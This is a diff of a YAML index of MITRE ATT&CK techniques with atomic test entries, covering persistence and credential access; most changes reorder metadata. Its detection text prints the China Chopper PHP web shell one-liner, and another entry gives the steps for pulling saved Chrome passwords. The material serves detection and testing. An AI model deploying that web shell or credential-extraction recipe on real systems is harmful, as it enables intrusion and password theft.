- Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
-
- Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_effective_permissions:
- - User
- - Administrator
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Netskope
+ - Mark Wee
+ - Praetorian
x_mitre_platforms:
- Linux
- macOS
@@ -15321,11 +15587,29 @@ persistence:
- SaaS
- Office 365
- Azure AD
- x_mitre_contributors:
- - Netskope
- - Mark Wee
- - Praetorian
- x_mitre_is_subtechnique: false
+ x_mitre_effective_permissions:
+ - User
+ - Administrator
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: |-
+ Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+
+ Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
+ x_mitre_defense_bypassed:
+ - Firewall
+ - Host intrusion prevention systems
+ - Network intrusion detection system
+ - Application control
+ - System access controls
+ - Anti-virus
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
+ x_mitre_version: '2.1'
atomic_tests: []
T1505.003:
technique:
@@ -15358,38 +15642,38 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-25T23:10:24.898Z'
+ modified: '2020-04-17T17:47:56.673Z'
created: '2019-12-13T16:46:18.927Z'
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Adversary access to Web server with vulnerability or account to upload and
+ serve the Web shell file.
+ x_mitre_permissions_required:
+ - SYSTEM
+ - User
+ x_mitre_detection: "Web shells can be difficult to detect. Unlike other forms
+ of persistent remote access, they do not initiate connections. The portion
+ of the Web shell that is on the server may be small and innocuous looking.
+ The PHP version of the China Chopper Web shell, for example, is the following
+ short payload: (Citation: Lee 2013) \n\n<?php @eval($_POST['password']);>\n\nNevertheless,
+ detection mechanisms exist. Process monitoring may be used to detect Web servers
+ that perform suspicious actions such as running cmd.exe or accessing files
+ that are not in the Web directory. File monitoring may be used to detect changes
+ to files in the Web directory of a Web server that do not match with updates
+ to the Web server's content and may indicate implantation of a Web shell script.
+ Log authentication attempts to the server and any unusual traffic patterns
+ to or from the server and internal network. (Citation: US-CERT Alert TA15-314A
+ Web Shells) "
x_mitre_data_sources:
- Process monitoring
- Netflow/Enclave netflow
- File monitoring
- Authentication logs
- x_mitre_detection: "Web shells can be difficult to detect. Unlike other forms
- of persistent remote access, they do not initiate connections. The portion
- of the Web shell that is on the server may be small and innocuous looking.
- The PHP version of the China Chopper Web shell, for example, is the following
- short payload: (Citation: Lee 2013) \n\n<?php @eval($_POST['password']);>
- \n\nNevertheless, detection mechanisms exist. Process monitoring may be used
- to detect Web servers that perform suspicious actions such as running cmd.exe
- or accessing files that are not in the Web directory. File monitoring may
- be used to detect changes to files in the Web directory of a Web server that
- do not match with updates to the Web server's content and may indicate implantation
- of a Web shell script. Log authentication attempts to the server and any unusual
- traffic patterns to or from the server and internal network. (Citation: US-CERT
- Alert TA15-314A Web Shells) "
- x_mitre_permissions_required:
- - SYSTEM
- - User
- x_mitre_system_requirements:
- - Adversary access to Web server with vulnerability or account to upload and
- serve the Web shell file.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
identifier: T1505.003
atomic_tests:
- name: Web Shell Written to Disk
@@ -15436,6 +15720,14 @@ persistence:
description: 'Mandiant. (2015, February 24). M-Trends 2015: A View from the
Front Lines. Retrieved May 18, 2016.'
source_name: Mandiant M-Trends 2015
+ - source_name: FireEye WMI SANS 2015
+ url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf
+ description: Devon Kerr. (2015). There's Something About WMI. Retrieved May
+ 4, 2020.
+ - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
+ description: Ballenthin, W., et al. (2015). Windows Management Instrumentation
+ (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.
+ source_name: FireEye WMI 2015
- url: https://www.secureworks.com/blog/wmi-persistence
description: Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016,
March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016.
@@ -15462,7 +15754,7 @@ persistence:
description: |-
Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015)
- Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)
+ Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)
WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.
id: attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58
@@ -15472,23 +15764,23 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-24T14:58:13.113Z'
+ modified: '2020-05-05T12:02:45.522Z'
created: '2020-01-24T14:07:56.276Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - WMI Objects
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: |-
Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence)
Monitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1086) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - WMI Objects
+ x_mitre_platforms:
+ - Windows
identifier: T1546.003
atomic_tests:
- name: Persistence via WMI Event Subscription
@@ -15583,20 +15875,10 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-25T22:22:10.041Z'
created: '2020-01-17T19:13:50.402Z'
- x_mitre_contributors:
- - Matthew Demaske, Adaptforward
- - Travis Smith, Tripwire
- - Pedro Harrison
- x_mitre_data_sources:
- - API monitoring
- - Windows event logs
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- - Windows Registry
- x_mitre_effective_permissions:
- - Administrator
- - SYSTEM
+ x_mitre_platforms:
+ - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
x_mitre_detection: "Monitor processes and command-line arguments for actions
that could create or modify services. Command-line invocation of tools capable
of adding or modifying services may be unusual, depending on how systems are
@@ -15625,10 +15907,20 @@ persistence:
as part of a chain of behavior that could lead to other activities, such as
network connections made for Command and Control, learning details about the
environment through Discovery, and Lateral Movement."
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - Windows
+ x_mitre_effective_permissions:
+ - Administrator
+ - SYSTEM
+ x_mitre_data_sources:
+ - API monitoring
+ - Windows event logs
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ - Windows Registry
+ x_mitre_contributors:
+ - Matthew Demaske, Adaptforward
+ - Travis Smith, Tripwire
+ - Pedro Harrison
identifier: T1543.003
atomic_tests:
- name: Modify Fax service to run PowerShell
@@ -15714,26 +16006,16 @@ persistence:
catch {}
T1547.004:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1547.004
- url: https://attack.mitre.org/techniques/T1547/004
- - external_id: CAPEC-579
- source_name: capec
- url: https://capec.mitre.org/data/definitions/579.html
- - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
- description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence,
- Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.'
- source_name: Cylance Reg Persistence Sept 2013
- - url: https://technet.microsoft.com/en-us/sysinternals/bb963902
- description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
- Retrieved June 6, 2016.
- source_name: TechNet Autoruns
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Winlogon Helper DLL
- description: "\nAdversaries may abuse features of Winlogon to execute DLLs and/or
+ created: '2020-01-24T16:59:59.688Z'
+ modified: '2020-04-21T16:00:41.277Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35
+ description: "Adversaries may abuse features of Winlogon to execute DLLs and/or
executables when a user logs in. Winlogon.exe is a Windows component responsible
for actions at logon/logoff as well as the secure attention sequence (SAS)
triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows
@@ -15749,15 +16031,25 @@ persistence:
user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell
executed when a user logs on\n\nAdversaries may take advantage of these features
to repeatedly execute malicious code and establish persistence."
- id: attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-25T16:17:22.487Z'
- created: '2020-01-24T16:59:59.688Z'
+ name: Winlogon Helper DLL
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1547.004
+ url: https://attack.mitre.org/techniques/T1547/004
+ - external_id: CAPEC-579
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/579.html
+ - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
+ description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence,
+ Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.'
+ source_name: Cylance Reg Persistence Sept 2013
+ - url: https://technet.microsoft.com/en-us/sysinternals/bb963902
+ description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
+ Retrieved June 6, 2016.
+ source_name: TechNet Autoruns
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -15876,16 +16168,16 @@ credential-access:
phase_name: credential-access
modified: '2020-03-20T15:56:55.022Z'
created: '2020-02-11T18:46:56.263Z'
- x_mitre_platforms:
- - Linux
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_permissions_required:
- - root
x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
distributions, can be used to watch for hostile processes attempting to access
/etc/passwd and /etc/shadow, alerting on the pid,
process name, and arguments of such programs.
+ x_mitre_permissions_required:
+ - root
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
atomic_tests: []
T1552.003:
technique:
@@ -15918,21 +16210,21 @@ credential-access:
phase_name: credential-access
modified: '2020-02-07T20:48:49.878Z'
created: '2020-02-04T13:02:11.685Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: Monitoring when the user's .bash_history is
read can help alert to suspicious activity. While users do typically rely
on their history of commands, they often access this history through other
utilities like "history" instead of commands like cat ~/.bash_history.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
identifier: T1552.003
atomic_tests:
- name: Search Through Bash History
@@ -15966,15 +16258,9 @@ credential-access:
name: sh
T1110:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1110
- url: https://attack.mitre.org/techniques/T1110
- - external_id: CAPEC-49
- source_name: capec
- url: https://capec.mitre.org/data/definitions/49.html
+ id: attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Brute Force
description: Adversaries may use brute force techniques to gain access to accounts
when passwords are unknown or when password hashes are obtained. Without knowledge
of the password for an account or set of accounts, an adversary may systematically
@@ -15982,14 +16268,20 @@ credential-access:
passwords can take place via interaction with a service that will check the
validity of those credentials or offline against previously acquired credential
data, such as password hashes.
- name: Brute Force
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1110
+ url: https://attack.mitre.org/techniques/T1110
+ - external_id: CAPEC-49
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/49.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-29T20:35:55.382Z'
+ modified: '2020-07-09T17:01:18.302Z'
created: '2017-05-31T21:31:22.767Z'
x_mitre_platforms:
- Linux
@@ -16058,22 +16350,22 @@ credential-access:
phase_name: credential-access
modified: '2020-03-24T20:41:08.996Z'
created: '2020-02-21T15:42:25.991Z'
- x_mitre_platforms:
- - Windows
- x_mitre_permissions_required:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - PowerShell logs
- - Process command-line parameters
- - Process monitoring
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
x_mitre_detection: |-
Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_data_sources:
+ - PowerShell logs
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - SYSTEM
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1552.005:
technique:
@@ -16112,23 +16404,23 @@ credential-access:
phase_name: credential-access
modified: '2020-03-25T18:18:20.366Z'
created: '2020-02-11T18:47:46.619Z'
- x_mitre_platforms:
- - AWS
- - GCP
- - Azure
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_data_sources:
+ - Authentication logs
+ - AWS CloudTrail logs
+ - Azure activity logs
x_mitre_detection: |+
Monitor access to the Instance Metadata API and look for anomalous queries.
It may be possible to detect adversary use of credentials they have obtained. See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.
- x_mitre_data_sources:
- - Authentication logs
- - AWS CloudTrail logs
- - Azure activity logs
- x_mitre_contributors:
- - Praetorian
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - AWS
+ - GCP
+ - Azure
atomic_tests: []
T1056.004:
technique:
@@ -16209,19 +16501,6 @@ credential-access:
phase_name: credential-access
modified: '2020-03-24T21:29:13.565Z'
created: '2020-02-11T19:01:15.930Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |-
- Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
- Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
- Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
x_mitre_data_sources:
- Windows event logs
- Process monitoring
@@ -16229,6 +16508,19 @@ credential-access:
- DLL monitoring
- Binary file metadata
- API monitoring
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_detection: |-
+ Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+ Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+ Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
identifier: T1056.004
atomic_tests:
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
@@ -16302,6 +16594,20 @@ credential-access:
phase_name: credential-access
modified: '2020-03-29T20:35:36.694Z'
created: '2020-02-11T18:39:59.959Z'
+ x_mitre_contributors:
+ - Diogo Fernandes
+ - Anastasios Pingios
+ x_mitre_data_sources:
+ - Authentication logs
+ - Office 365 account logs
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Monitor authentication logs for system and application login
+ failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If
+ authentication failures are high, then there may be a brute force attempt
+ to gain access to a system using legitimate credentials.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
@@ -16312,23 +16618,15 @@ credential-access:
- Office 365
- Azure AD
- SaaS
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: Monitor authentication logs for system and application login
- failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If
- authentication failures are high, then there may be a brute force attempt
- to gain access to a system using legitimate credentials.
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Authentication logs
- - Office 365 account logs
- x_mitre_contributors:
- - Diogo Fernandes
- - Anastasios Pingios
atomic_tests: []
T1552.001:
technique:
+ created: '2020-02-04T12:52:13.006Z'
+ modified: '2020-03-25T18:30:10.630Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ type: attack-pattern
id: attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc
description: |-
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
@@ -16359,32 +16657,6 @@ credential-access:
url: https://posts.specterops.io/head-in-the-clouds-bd038bb69e48
description: Maddalena, C.. (2018, September 12). Head in the Clouds. Retrieved
October 4, 2019.
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-03-25T18:30:10.630Z'
- created: '2020-02-04T12:52:13.006Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_system_requirements:
- - Access to files
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - User
- x_mitre_detection: 'While detecting adversaries accessing these files may be
- difficult without knowing they exist in the first place, it may be possible
- to detect adversary use of credentials they have obtained. Monitor the command-line
- arguments of executing processes for suspicious words or regular expressions
- that may indicate searching for a password (for example: password, pwd, login,
- secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078)
- for more information.'
- x_mitre_data_sources:
- - Process command-line parameters
- - File monitoring
- x_mitre_contributors:
- - Microsoft Threat Intelligence Center (MSTIC)
x_mitre_platforms:
- Linux
- macOS
@@ -16392,6 +16664,26 @@ credential-access:
- AWS
- GCP
- Azure
+ x_mitre_contributors:
+ - Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - File monitoring
+ x_mitre_detection: 'While detecting adversaries accessing these files may be
+ difficult without knowing they exist in the first place, it may be possible
+ to detect adversary use of credentials they have obtained. Monitor the command-line
+ arguments of executing processes for suspicious words or regular expressions
+ that may indicate searching for a password (for example: password, pwd, login,
+ secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078)
+ for more information.'
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - User
+ x_mitre_system_requirements:
+ - Access to files
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1552.001
atomic_tests:
- name: Extract Browser and System credentials with LaZagne
@@ -16451,27 +16743,27 @@ credential-access:
elevation_required: true
T1555:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1555
- url: https://attack.mitre.org/techniques/T1555
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Credentials from Password Stores
+ created: '2020-02-11T18:48:28.456Z'
+ modified: '2020-03-25T18:40:15.564Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ type: attack-pattern
+ id: attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0
description: Adversaries may search for common password storage locations to
obtain user credentials. Passwords are stored in several places on a system,
depending on the operating system or application holding the credentials.
There are also specific applications that store passwords to make it easier
for users manage and maintain. Once credentials are obtained, they can be
used to perform lateral movement and access restricted information.
- id: attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-03-25T18:40:15.564Z'
- created: '2020-02-11T18:48:28.456Z'
+ name: Credentials from Password Stores
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1555
+ url: https://attack.mitre.org/techniques/T1555
x_mitre_platforms:
- Linux
- macOS
@@ -16494,6 +16786,40 @@ credential-access:
atomic_tests: []
T1555.003:
technique:
+ created: '2020-02-12T18:57:36.041Z'
+ modified: '2020-02-17T13:20:02.386Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ type: attack-pattern
+ id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+ description: "Adversaries may acquire credentials from web browsers by reading
+ files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
+ Web browsers commonly save credentials such as website usernames and passwords
+ so that they do not need to be entered manually in the future. Web browsers
+ typically store the credentials in an encrypted format within a credential
+ store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor
+ example, on Windows systems, encrypted credentials may be obtained from Google
+ Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User
+ Data\\Default\\Login Data and executing a SQL query: SELECT action_url,
+ username_value, password_value FROM logins;. The plaintext password
+ can then be obtained by passing the encrypted credentials to the Windows API
+ function CryptUnprotectData, which uses the victim’s cached logon
+ credentials as the decryption key. (Citation: Microsoft CryptUnprotectData
+ April 2018)\n \nAdversaries have executed similar procedures for common web
+ browsers such as FireFox, Safari, Edge, etc. (Citation: Proofpoint Vega Credential
+ Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017)\n\nAdversaries
+ may also acquire credentials by searching web browser process memory for patterns
+ that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter
+ acquiring credentials from web browsers, adversaries may attempt to recycle
+ the credentials across different systems and/or accounts in order to expand
+ access. This can result in significantly furthering an adversary's objective
+ in cases where credentials gained from web browsers overlap with privileged
+ accounts (e.g. domain administrator)."
+ name: Credentials from Web Browsers
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1555.003
@@ -16519,40 +16845,6 @@ credential-access:
url: https://github.com/putterpanda/mimikittenz
description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
Retrieved June 20, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Credentials from Web Browsers
- description: "Adversaries may acquire credentials from web browsers by reading
- files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
- Web browsers commonly save credentials such as website usernames and passwords
- so that they do not need to be entered manually in the future. Web browsers
- typically store the credentials in an encrypted format within a credential
- store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor
- example, on Windows systems, encrypted credentials may be obtained from Google
- Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User
- Data\\Default\\Login Data and executing a SQL query: SELECT action_url,
- username_value, password_value FROM logins;. The plaintext password
- can then be obtained by passing the encrypted credentials to the Windows API
- function CryptUnprotectData, which uses the victim’s cached logon
- credentials as the decryption key. (Citation: Microsoft CryptUnprotectData
- April 2018)\n \nAdversaries have executed similar procedures for common web
- browsers such as FireFox, Safari, Edge, etc. (Citation: Proofpoint Vega Credential
- Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017)\n\nAdversaries
- may also acquire credentials by searching web browser process memory for patterns
- that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter
- acquiring credentials from web browsers, adversaries may attempt to recycle
- the credentials across different systems and/or accounts in order to expand
- access. This can result in significantly furthering an adversary's objective
- in cases where credentials gained from web browsers overlap with privileged
- accounts (e.g. domain administrator)."
- id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-02-17T13:20:02.386Z'
- created: '2020-02-12T18:57:36.041Z'
x_mitre_platforms:
- Linux
- macOS
@@ -16660,28 +16952,28 @@ credential-access:
phase_name: credential-access
modified: '2020-02-07T20:49:18.834Z'
created: '2020-02-04T12:58:40.678Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Sudhanshu Chauhan, @Sudhanshu_C
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - Windows Registry
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Ability to query some Registry locations depends on the adversary's level
+ of access. User permissions are usually limited to access of user-related
+ Registry keys.
+ x_mitre_permissions_required:
+ - Administrator
+ - User
